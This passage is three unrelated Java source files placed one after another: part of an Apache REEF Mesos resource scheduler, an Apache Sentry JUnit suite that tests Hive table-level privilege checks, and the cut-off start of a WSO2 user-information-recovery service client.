this.offers.put(offer.getId().getValue(), offer); } for (final NodeDescriptorEventImpl.Builder ndpBuilder : nodeDescriptorEvents.values()) { this.reefEventHandlers.onNodeDescriptor(ndpBuilder.build()); } if (outstandingRequests.size() > 0) { doResourceRequest(outstandingRequests.remove()); } } @Override public void offerRescinded(final SchedulerDriver driver, final Protos.OfferID offerId) { for (final String executorId : this.executorIdToLaunchedRequests.keySet()) { if (executorId.startsWith(offerId.getValue())) { this.outstandingRequests.add(this.executorIdToLaunchedRequests.remove(executorId)); } } } @Override public void statusUpdate(final SchedulerDriver driver, final Protos.TaskStatus taskStatus) { LOG.log(Level.SEVERE, "Task Status Update:", taskStatus.toString()); final ResourceStatusEventImpl.Builder resourceStatus = ResourceStatusEventImpl.newBuilder().setIdentifier(taskStatus.getTaskId().getValue()); switch(taskStatus.getState()) { case TASK_STARTING: handleNewExecutor(taskStatus); // As there is only one Mesos Task per Mesos Executor, this is a new executor. return; case TASK_RUNNING: resourceStatus.setState(State.RUNNING); break; case TASK_FINISHED: if (taskStatus.getData().toStringUtf8().equals("eval_not_run")) { // TODO[JIRA REEF-102]: a hack to pass closeEvaluator test, replace this with a better interface return; } resourceStatus.setState(State.DONE); break; case TASK_KILLED: resourceStatus.setState(State.KILLED); break; case TASK_LOST: case TASK_FAILED: resourceStatus.setState(State.FAILED); break; case TASK_STAGING: throw new RuntimeException("TASK_STAGING should not be used for status update"); default: throw new RuntimeException("Unknown TaskStatus"); } if (taskStatus.getMessage() != null) { resourceStatus.setDiagnostics(taskStatus.getMessage()); } this.reefEventHandlers.onResourceStatus(resourceStatus.build()); } @Override public void frameworkMessage(final SchedulerDriver driver, final Protos.ExecutorID executorId, final Protos.SlaveID slaveId, final byte[] data) { LOG.log(Level.INFO, "Framework Message. driver: {0} executorId: {1} slaveId: {2} data: {3}", new Object[]{driver, executorId, slaveId, data}); } @Override public void disconnected(final SchedulerDriver driver) { this.onRuntimeError(new RuntimeException("Scheduler disconnected from MesosMaster")); } @Override public void slaveLost(final SchedulerDriver driver, final Protos.SlaveID slaveId) { LOG.log(Level.SEVERE, "Slave Lost. {0}", slaveId.getValue()); } @Override public void executorLost(final SchedulerDriver driver, final Protos.ExecutorID executorId, final Protos.SlaveID slaveId, final int status) { final String diagnostics = "Executor Lost. executorid: "+executorId.getValue()+" slaveid: "+slaveId.getValue(); final ResourceStatusEvent resourceStatus = ResourceStatusEventImpl.newBuilder() .setIdentifier(executorId.getValue()) .setState(State.FAILED) .setExitCode(status) .setDiagnostics(diagnostics) .build(); this.reefEventHandlers.onResourceStatus(resourceStatus); } @Override public void error(final SchedulerDriver driver, final String message) { this.onRuntimeError(new RuntimeException(message)); } ///////////////////////////////////////////////////////////////// // HELPER METHODS public void onStart() { this.schedulerDriverEStage.onNext(this.mesosMaster); } public void onStop() { this.mesosMaster.stop(); try { this.schedulerDriverEStage.close(); } catch (final Exception e) { throw new RuntimeException(e); } } public void onResourceRequest(final ResourceRequestEvent resourceRequestEvent) { this.outstandingRequestCounter += resourceRequestEvent.getResourceCount(); updateRuntimeStatus(); doResourceRequest(resourceRequestEvent); } public void onResourceRelease(final ResourceReleaseEvent resourceReleaseEvent) { this.executors.releaseEvaluator(new EvaluatorRelease(resourceReleaseEvent.getIdentifier())); this.executors.remove(resourceReleaseEvent.getIdentifier()); updateRuntimeStatus(); } /** * Greedily acquire resources by launching a Mesos Task(w/ our custom MesosExecutor) on REEF Evaluator request. * Either called from onResourceRequest(for a new request) or resourceOffers(for an outstanding request). * TODO[JIRA REEF-102]: reflect priority and rack/node locality specified in resourceRequestEvent. */ private synchronized void doResourceRequest(final ResourceRequestEvent resourceRequestEvent) { int tasksToLaunchCounter = resourceRequestEvent.getResourceCount(); for (final Offer offer : this.offers.values()) { final int cpuSlots = getCpu(offer) / resourceRequestEvent.getVirtualCores().get(); final int memSlots = getMemory(offer) / resourceRequestEvent.getMemorySize().get(); final int taskNum = Math.min(Math.min(cpuSlots, memSlots), tasksToLaunchCounter); if (taskNum > 0 && satisfySlaveConstraint(resourceRequestEvent, offer)) { final List<TaskInfo> tasksToLaunch = new ArrayList<>(); tasksToLaunchCounter -= taskNum; // Launch as many MesosTasks on the same node(offer) as possible to exploit locality. for (int j = 0; j < taskNum; j++) { final String id = offer.getId().getValue() + "-" + String.valueOf(j); final String executorLaunchCommand = getExecutorLaunchCommand(id, resourceRequestEvent.getMemorySize().get()); final ExecutorInfo executorInfo = ExecutorInfo.newBuilder() .setExecutorId(ExecutorID.newBuilder() .setValue(id) .build()) .setCommand(CommandInfo.newBuilder() .setValue(executorLaunchCommand) .addUris(URI.newBuilder().setValue(reefTarUri).build()) .build()) .build(); final TaskInfo taskInfo = TaskInfo.newBuilder() .setTaskId(TaskID.newBuilder() .setValue(id) .build()) .setName(id) .setSlaveId(offer.getSlaveId()) .addResources(Resource.newBuilder() .setName("mem") .setType(Type.SCALAR) .setScalar(Value.Scalar.newBuilder() .setValue(resourceRequestEvent.getMemorySize().get()) .build()) .build()) .addResources(Resource.newBuilder() .setName("cpus") .setType(Type.SCALAR) .setScalar(Value.Scalar.newBuilder() .setValue(resourceRequestEvent.getVirtualCores().get()) .build()) .build()) .setExecutor(executorInfo) .build(); tasksToLaunch.add(taskInfo); this.executorIdToLaunchedRequests.put(id, resourceRequestEvent); } final Filters filters = Filters.newBuilder().setRefuseSeconds(0).build(); mesosMaster.launchTasks(Collections.singleton(offer.getId()), tasksToLaunch, filters); } else { mesosMaster.declineOffer(offer.getId()); } } // the offers are no longer valid(all launched or declined) this.offers.clear(); // Save leftovers that couldn't be launched outstandingRequests.add(ResourceRequestEventImpl.newBuilder() .mergeFrom(resourceRequestEvent) .setResourceCount(tasksToLaunchCounter) .build()); } private void handleNewExecutor(final Protos.TaskStatus taskStatus) { final ResourceRequestEvent resourceRequestProto = this.executorIdToLaunchedRequests.remove(taskStatus.getTaskId().getValue()); final EventHandler<EvaluatorControl> evaluatorControlHandler = this.mesosRemoteManager.getHandler(taskStatus.getMessage(), EvaluatorControl.class); this.executors.add(taskStatus.getTaskId().getValue(), resourceRequestProto.getMemorySize().get(), evaluatorControlHandler); final ResourceAllocationEvent alloc = ResourceEventImpl.newAllocationBuilder() .setIdentifier(taskStatus.getTaskId().getValue()) .setNodeId(taskStatus.getSlaveId().getValue()) .setResourceMemory(resourceRequestProto.getMemorySize().get()) .setVirtualCores(resourceRequestProto.getVirtualCores().get()) .setRuntimeName(RuntimeIdentifier.RUNTIME_NAME) .build(); reefEventHandlers.onResourceAllocation(alloc); this.outstandingRequestCounter--; this.updateRuntimeStatus(); } private synchronized void updateRuntimeStatus() { final RuntimeStatusEventImpl.Builder builder = RuntimeStatusEventImpl.newBuilder() .setName(RUNTIME_NAME) .setState(State.RUNNING) .setOutstandingContainerRequests(this.outstandingRequestCounter); for (final String executorId : this.executors.getExecutorIds()) { builder.addContainerAllocation(executorId); } this.reefEventHandlers.onRuntimeStatus(builder.build()); } private void onRuntimeError(final Throwable throwable) { this.mesosMaster.stop(); try { this.schedulerDriverEStage.close(); } catch (final Exception e) { throw new RuntimeException(e); } final RuntimeStatusEventImpl.Builder runtimeStatusBuilder = RuntimeStatusEventImpl.newBuilder() .setState(State.FAILED) .setName(RUNTIME_NAME); final Encoder<Throwable> codec = new ObjectSerializableCodec<>(); runtimeStatusBuilder.setError(ReefServiceProtos.RuntimeErrorProto.newBuilder() .setName(RUNTIME_NAME) .setMessage(throwable.getMessage()) .setException(ByteString.copyFrom(codec.encode(throwable))) .build()); this.reefEventHandlers.onRuntimeStatus(runtimeStatusBuilder.build()); } private boolean satisfySlaveConstraint(final ResourceRequestEvent resourceRequestEvent, final Offer offer) { return resourceRequestEvent.getNodeNameList().size() == 0 || resourceRequestEvent.getNodeNameList().contains(offer.getSlaveId().getValue()); } private int getMemory(final Offer offer) { for (final Resource resource : offer.getResourcesList()) { if (resource.getName().equals("mem")) { return (int)resource.getScalar().getValue(); } } return 0; } private int getCpu(final Offer offer) { for (final Resource resource : offer.getResourcesList()) { if (resource.getName().equals("cpus")) { return (int)resource.getScalar().getValue(); } } return 0; } private String getExecutorLaunchCommand(final String executorID, final int memorySize) { final String defaultJavaPath = System.getenv("JAVA_HOME") + "/bin/" + "java"; final String classPath = "-classpath " + StringUtils.join(this.classpath.getEvaluatorClasspath(), ":"); final String logging = "-Djava.util.logging.config.class=org.apache.reef.util.logging.Config"; final String mesosExecutorId = "-mesos_executor_id " + executorID; return new StringBuilder() .append(defaultJavaPath + " ") .append("-XX:PermSize=128m" + " ") .append("-XX:MaxPermSize=128m" + " ") .append("-Xmx" + String.valueOf(memorySize) + "m" + " ") .append(classPath + " ") .append(logging + " ") .append(REEFExecutor.class.getName() + " ") .append(mesosExecutorId + " ") .toString(); } private String getReefTarUri(final String jobIdentifier) { try { // Create REEF_TAR final FileOutputStream fileOutputStream = new FileOutputStream(REEF_TAR); final TarArchiveOutputStream tarArchiveOutputStream = new TarArchiveOutputStream(new GZIPOutputStream(fileOutputStream)); final File globalFolder = new File(this.fileNames.getGlobalFolderPath()); final DirectoryStream<Path> directoryStream = Files.newDirectoryStream(globalFolder.toPath()); for (final Path path : directoryStream) { tarArchiveOutputStream.putArchiveEntry(new TarArchiveEntry(path.toFile(), globalFolder + "/" + path.getFileName())); final BufferedInputStream bufferedInputStream = new BufferedInputStream(new FileInputStream(path.toFile())); IOUtils.copy(bufferedInputStream, tarArchiveOutputStream); bufferedInputStream.close(); tarArchiveOutputStream.closeArchiveEntry(); } directoryStream.close(); tarArchiveOutputStream.close(); fileOutputStream.close(); // Upload REEF_TAR to HDFS final FileSystem fileSystem = FileSystem.get(new Configuration()); final org.apache.hadoop.fs.Path src = new org.apache.hadoop.fs.Path(REEF_TAR); final String reefTarUriValue = fileSystem.getUri().toString() + this.jobSubmissionDirectoryPrefix + "/" + jobIdentifier + "/" + REEF_TAR; final org.apache.hadoop.fs.Path dst = new org.apache.hadoop.fs.Path(reefTarUriValue); fileSystem.copyFromLocalFile(src, dst); return reefTarUriValue; } catch (final IOException e) { throw new RuntimeException(e); } } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.sentry.tests.e2e.hive; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertTrue; import java.io.File; import java.io.FileOutputStream; import java.sql.Connection; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import junit.framework.Assert; import org.apache.sentry.provider.file.PolicyFile; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import com.google.common.io.Resources; /* Tests privileges at table scope within a single database. */ public class TestPrivilegesAtTableScope extends AbstractTestWithStaticConfiguration { private static PolicyFile policyFile; private final static String MULTI_TYPE_DATA_FILE_NAME = "emp.dat"; @Before public void setup() throws Exception { policyFile = super.setupPolicy(); super.setup(); prepareDBDataForTest(); } @BeforeClass public static void setupTestStaticConfiguration() throws Exception { AbstractTestWithStaticConfiguration.setupTestStaticConfiguration(); } protected static void prepareDBDataForTest() throws Exception { // copy data file to test dir File dataDir = context.getDataDir(); File dataFile = new File(dataDir, MULTI_TYPE_DATA_FILE_NAME); FileOutputStream to = new FileOutputStream(dataFile); Resources.copy(Resources.getResource(MULTI_TYPE_DATA_FILE_NAME), to); to.close(); // setup db objects needed by the test Connection connection = context.createConnection(ADMIN1); Statement statement = context.createStatement(connection); statement.execute("DROP DATABASE IF EXISTS DB_1 CASCADE"); statement.execute("CREATE DATABASE DB_1"); statement.execute("USE DB_1"); statement.execute("CREATE TABLE " + TBL1 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL1); statement.execute("CREATE TABLE " + TBL2 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL2); statement.execute("CREATE VIEW VIEW_1 AS SELECT A, B FROM " + TBL1); statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, loads data into * TBL1, TBL2 Admin grants SELECT on TBL1, TBL2, INSERT on TBL1 to * USER_GROUP of which user1 is a member. */ @Test public void testInsertAndSelect() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "insert_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("insert_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=insert") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE DB_1"); // test user can insert statement.execute("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); // test user can query table statement.executeQuery("SELECT A FROM " + TBL2); // negative test: test user can't drop try { statement.execute("DROP TABLE " + TBL1); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); // connect as admin and drop TBL1 connection = context.createConnection(ADMIN1); statement = context.createStatement(connection); statement.execute("USE DB_1"); statement.execute("DROP TABLE " + TBL1); statement.close(); connection.close(); // negative test: connect as user1 and try to recreate TBL1 connection = context.createConnection(USER1_1); statement = context.createStatement(connection); statement.execute("USE DB_1"); try { statement.execute("CREATE TABLE " + TBL1 + "(A STRING)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); // connect as admin to restore the TBL1 connection = context.createConnection(ADMIN1); statement = context.createStatement(connection); statement.execute("USE DB_1"); statement.execute("CREATE TABLE " + TBL1 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, loads data into * TBL1, TBL2. Admin grants INSERT on TBL1, SELECT on TBL2 to USER_GROUP * of which user1 is a member. */ @Test public void testInsert() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "insert_tab1", "select_tab2") .addPermissionsToRole("insert_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=insert") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute insert on table statement.execute("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); // negative test: user can't query table try { statement.executeQuery("SELECT A FROM " + TBL1); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't query view try { statement.executeQuery("SELECT A FROM VIEW_1"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test case: show tables shouldn't list VIEW_1 ResultSet resultSet = statement.executeQuery("SHOW TABLES"); while (resultSet.next()) { String tableName = resultSet.getString(1); assertNotNull("table name is null in result set", tableName); assertFalse("Found VIEW_1 in the result set", "VIEW_1".equalsIgnoreCase(tableName)); } // negative test: test user can't create a new view try { statement.executeQuery("CREATE VIEW VIEW_2(A) AS SELECT A FROM " + TBL1); Assert.fail("Expected SQL Exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, loads data into * TBL1, TBL2. Admin grants SELECT on TBL1, TBL2 to USER_GROUP of which * user1 is a member. */ @Test public void testSelect() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("insert_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=insert") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query on table statement.executeQuery("SELECT A FROM " + TBL1); // negative test: test insert into table try { statement.executeQuery("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't query view try { statement.executeQuery("SELECT A FROM VIEW_1"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't create a new view try { statement.executeQuery("CREATE VIEW VIEW_2(A) AS SELECT A FROM " + TBL1); Assert.fail("Expected SQL Exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL1,TBL2 to * USER_GROUP of which user1 is a member. */ @Test public void testTableViewJoin() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query TBL1 JOIN TBL2 statement.executeQuery("SELECT T1.B FROM " + TBL1 + " T1 JOIN " + TBL2 + " T2 ON (T1.B = T2.B)"); // negative test: test user can't execute query VIEW_1 JOIN TBL2 try { statement.executeQuery("SELECT V1.B FROM VIEW_1 V1 JOIN " + TBL2 + " T2 ON (V1.B = T2.B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL2 to USER_GROUP of * which user1 is a member. */ @Test public void testTableViewJoin2() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query on TBL2 statement.executeQuery("SELECT A FROM " + TBL2); // negative test: test user can't execute query VIEW_1 JOIN TBL2 try { statement.executeQuery("SELECT VIEW_1.B FROM VIEW_1 JOIN " + TBL2 + " ON (VIEW_1.B = " + TBL2 + ".B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't execute query TBL1 JOIN TBL2 try { statement.executeQuery("SELECT " + TBL1 + ".B FROM " + TBL1 + " JOIN " + TBL2 + " ON (" + TBL1 + ".B = " + TBL2 + ".B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL2, VIEW_1 to * USER_GROUP of which user1 is a member. */ @Test public void testTableViewJoin3() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab2", "select_view1") .addPermissionsToRole("select_view1", "server=server1->db=DB_1->table=VIEW_1->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query on TBL2 statement.executeQuery("SELECT A FROM " + TBL2); // test user can execute query VIEW_1 JOIN TBL2 statement.executeQuery("SELECT V1.B FROM VIEW_1 V1 JOIN " + TBL2 + " T2 ON (V1.B = T2.B)"); // test user can execute query on VIEW_1 statement.executeQuery("SELECT A FROM VIEW_1"); // negative test: test user can't execute query TBL1 JOIN TBL2 try { statement.executeQuery("SELECT T1.B FROM " + TBL1 + " T1 JOIN " + TBL2 + " T2 ON (T1.B = T2.B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL1, VIEW_1 to * USER_GROUP of which user1 is a member. */ @Test public void testTableViewJoin4() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_view1") .addPermissionsToRole("select_view1", "server=server1->db=DB_1->table=VIEW_1->action=select") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query VIEW_1 JOIN TBL1 statement.executeQuery("SELECT VIEW_1.B FROM VIEW_1 JOIN " + TBL1 + " ON (VIEW_1.B = " + TBL1 + ".B)"); // negative test: test user can't execute query TBL1 JOIN TBL2 try { statement.executeQuery("SELECT " + TBL1 + ".B FROM " + TBL1 + " JOIN " + TBL2 + " ON (" + TBL1 + ".B = " + TBL2 + ".B)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /*** * Verify truncate table permissions for different users with different * privileges * @throws Exception */ @Test public void testTruncateTable() throws Exception { File dataDir = context.getDataDir(); // copy data file to test dir File dataFile = new File(dataDir, MULTI_TYPE_DATA_FILE_NAME); FileOutputStream to = new FileOutputStream(dataFile); Resources.copy(Resources.getResource(MULTI_TYPE_DATA_FILE_NAME), to); to.close(); policyFile.setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // setup db objects needed by the test Connection connection = context.createConnection(ADMIN1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); statement.execute("DROP TABLE if exists " + TBL1); statement.execute("DROP TABLE if exists " + TBL2); statement.execute("DROP TABLE if exists " + TBL3); statement.execute("CREATE TABLE " + TBL1 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("CREATE TABLE " + TBL2 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("CREATE TABLE " + TBL3 + "(B INT, A STRING) " + " row format delimited fields terminated by '|' stored as textfile"); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL1); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL2); statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath() + "' INTO TABLE " + TBL3); // verify admin can execute truncate table statement.execute("TRUNCATE TABLE " + TBL1); assertFalse(hasData(statement, TBL1)); statement.close(); connection.close(); policyFile .addRolesToGroup(USERGROUP1, "all_tab1") .addPermissionsToRole("all_tab1", "server=server1->db=" + DB1 + "->table=" + TBL2) .addRolesToGroup(USERGROUP2, "drop_tab1") .addPermissionsToRole("drop_tab1", "server=server1->db=" + DB1 + "->table=" + TBL3 + "->action=drop", "server=server1->db=" + DB1 + "->table=" + TBL3 + "->action=select") .addRolesToGroup(USERGROUP3, "select_tab1") .addPermissionsToRole("select_tab1", "server=server1->db=" + DB1 + "->table=" + TBL1 + "->action=select"); writePolicyFile(policyFile); connection = context.createConnection(USER1_1); statement = context.createStatement(connection); statement.execute("USE " + DB1); // verify all on tab can truncate table statement.execute("TRUNCATE TABLE " + TBL2); assertFalse(hasData(statement, TBL2)); statement.close(); connection.close(); connection = context.createConnection(USER2_1); statement = context.createStatement(connection); statement.execute("USE " + DB1); // verify drop on tab can truncate table statement.execute("TRUNCATE TABLE " + TBL3); assertFalse(hasData(statement, TBL3)); statement.close(); connection.close(); connection = context.createConnection(USER3_1); statement = context.createStatement(connection); statement.execute("USE " + DB1); // verify select on tab can NOT truncate table context.assertAuthzException(statement, "TRUNCATE TABLE " + TBL3); statement.close(); connection.close(); } /** * Test queries without from clause. Hive rewrites the queries with dummy db and table * entities which should not trip authorization check. * @throws Exception */ @Test public void testSelectWithoutFrom() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "all_tab1") .addPermissionsToRole("all_tab1", "server=server1->db=" + DB1 + "->table=" + TBL1) .addRolesToGroup(USERGROUP2, "select_tab1") .addPermissionsToRole("select_tab1", "server=server1->db=" + DB1 + "->table=" + TBL1) .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); // test with implicit default database assertTrue(statement.executeQuery("SELECT 1 ").next()); assertTrue(statement.executeQuery("SELECT current_database()").next()); // test after switching database statement.execute("USE " + DB1); assertTrue(statement.executeQuery("SELECT 1 ").next()); assertTrue(statement.executeQuery("SELECT current_database() ").next()); statement.close(); connection.close(); } // verify that the given table has data private boolean hasData(Statement stmt, String tableName) throws Exception { ResultSet rs1 = stmt.executeQuery("SELECT * FROM " + tableName); boolean hasResults = rs1.next(); rs1.close(); return hasResults; } @Test public void testDummyPartition() throws Exception { policyFile.setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // setup db objects needed by the test Connection connection = context.createConnection(ADMIN1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); statement.execute("DROP TABLE if exists " + TBL1); statement.execute("CREATE table " + TBL1 + " (a int) PARTITIONED BY (b string, c string)"); statement.execute("DROP TABLE if exists " + TBL3); statement.execute("CREATE table " + TBL3 + " (a2 int) PARTITIONED BY (b2 string, c2 string)"); statement.close(); connection.close(); policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL3 + "->action=insert"); writePolicyFile(policyFile); connection = context.createConnection(USER1_1); statement = context.createStatement(connection); statement.execute("USE " + DB1); statement.execute("INSERT OVERWRITE TABLE " + TBL3 + " PARTITION(b2='abc', c2) select a, b as c2 from " + TBL1); statement.close(); connection.close(); } }
/* * Copyright (c) 2016, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.wso2.carbon.identity.mgt.endpoint.serviceclient; import org.apache.axis2.AxisFault; import org.apache.axis2.client.ServiceClient; import org.wso2.carbon.captcha.mgt.beans.xsd.CaptchaInfoBean; import org.wso2.carbon.identity.mgt.endpoint.IdentityManagementEndpointConstants; import org.wso2.carbon.identity.mgt.endpoint.IdentityManagementServiceUtil; import org.wso2.carbon.identity.mgt.stub.UserInformationRecoveryServiceIdentityExceptionException; import org.wso2.carbon.identity.mgt.stub.UserInformationRecoveryServiceIdentityMgtServiceExceptionException; import org.wso2.carbon.identity.mgt.stub.UserInformationRecoveryServiceStub; import org.wso2.carbon.identity.mgt.stub.beans.VerificationBean; import org.wso2.carbon.identity.mgt.stub.dto.ChallengeQuestionIdsDTO; import org.wso2.carbon.identity.mgt.stub.dto.UserChallengesCollectionDTO; import org.wso2.carbon.identity.mgt.stub.dto.UserChallengesDTO; import org.wso2.carbon.identity.mgt.stub.dto.UserIdentityClaimDTO; import java.rmi.RemoteException; /** * This class invokes the client operations of UserInformationRecoveryService. */ public class UserInformationRecoveryClient { private UserInformationRecoveryServiceStub stub; /** * Initiates UserInformationRecoveryClient instance * * @throws AxisFault */ public UserInformationRecoveryClient() throws AxisFault { StringBuilder builder = new StringBuilder(); String serviceURL = null; serviceURL = builder.append(IdentityManagementServiceUtil.getInstance().getServiceContextURL()).append (IdentityManagementEndpointConstants.ServiceEndpoints.USER_INFORMATION_RECOVERY_SERVICE).toString() .replaceAll("(?<!(http:|https:))//", "/"); stub = new UserInformationRecoveryServiceStub(serviceURL); ServiceClient client = stub._getServiceClient(); IdentityManagementServiceUtil.getInstance().authenticate(client); } /** * Generates a captcha. * * @return an instance of CaptchaInfoBean which includes captcha information * @throws RemoteException * @throws UserInformationRecoveryServiceIdentityMgtServiceExceptionException */ public CaptchaInfoBean generateCaptcha() throws RemoteException, UserInformationRecoveryServiceIdentityMgtServiceExceptionException { return stub.getCaptcha(); } /** * Verifies the captcha answer. * * @param username username of the user * @param captcha an instance of CaptchaInfoBean * @return an instance of VerificationBean which denotes the status * @throws RemoteException * @throws 